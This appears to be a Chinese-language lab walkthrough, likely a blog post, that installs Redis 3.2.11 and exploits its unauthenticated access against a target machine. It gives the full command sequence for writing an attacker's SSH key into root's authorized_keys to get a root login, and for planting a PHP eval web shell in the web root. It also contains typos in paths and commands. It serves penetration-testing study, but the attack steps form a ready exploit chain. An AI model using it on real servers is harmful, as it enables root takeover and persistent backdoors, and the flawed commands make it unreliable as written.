#redis的安装

1
2
3
4
5
6
7
8
9
10
11
12
wget http://download.redis.io/releases/redis-3.2.11.tar.gz //下载redis
tar zxvf redis-3.2.11.tar.gz //解压
cd redis-3.2.11
make
make test
cp redis.conf /etc/
cd /src/
cp redis-server /usr/bin/
cp redis-cli /use/bin/
cd ../
vim /etc/redis.conf
redis-server /etc/redis.conf

upload successful
upload successful
*报错1:gcc:命令未找到
yum install gcc-c++
*报错2:You need tcl 8.5 or newer in order to run the Redis test
wget http://downloads.sourceforge.net/tcl/tcl8.6.1-src.tar.gz
sudo tar xzvf tcl8.6.1-src.tar.gz -C /usr/local/
cd /usr/local/tcl8.6.1/unix/
sudo ./configure
sudo make
sudo make install
*报错3:致命错误:jemalloc/jemalloc.h:没有那个文件或目录
make MALLOC=libc

#验证未授权访问

#写入ssh公钥,获取操作系统权限

1
2
3
4
靶机:
ifconfig
cd redis-3.2.11
ssh-keygen -t rsa
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
攻击机:
cd redis-3.2.11
redis-cli -h 靶机地址
keys * //返回(empty list or set)
exit
ssh root@靶机地址 //提示需要密码
Ctrl+C 退出
ssh-keygen -t rsa //生成ssh公钥
cd /root/.ssh
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n")>key.txt //公钥写入key.txt文件
cp key.txt /redis-3.2.11/
cd /redis-3.2.11/
cat key.txt|redis-cli -h 靶机地址 -x set crack //写入文件
redis-cli -h 靶机地址 //远程登陆靶机redis服务
get crack
config get dir
config set dir /root/.ssh //切换redis数据文件保存目录为.ssh
config set dbfilename "authorized_keys" //设置上传公钥的备份文件名字为authorized_keys
save
exit
ssh root@靶机地址
成功登陆

*报错1:No route to host
靶机设置:
firewall-cmd –query-port=6379/tcp //查看6379端口是否对外开放
firewall-cmd –add-port=6379/tcp –permanent //开放6379端口
systemctl status firewalld //重启防火墙
firewall-cmd –list-ports //查看开放端口

#写入webshell

1
2
3
4
5
6
7
靶机:
yum update httpd
yum install httpd
systemctl start httpd
firewall-cmd --add-port=80/tcp --permanent //开放80端口
systemctl status firewalld //重启防火墙
浏览器访问对应靶机地址,显示该界面

upload successful

1
2
3
4
5
6
7
攻击机:
redis-cli -h 靶机地址
config set dir /vat/www/html
set xxx "\n\n<?php @eval($_POST['salt']);?>\n\n"
config set dbfilename webshell.php
save
exit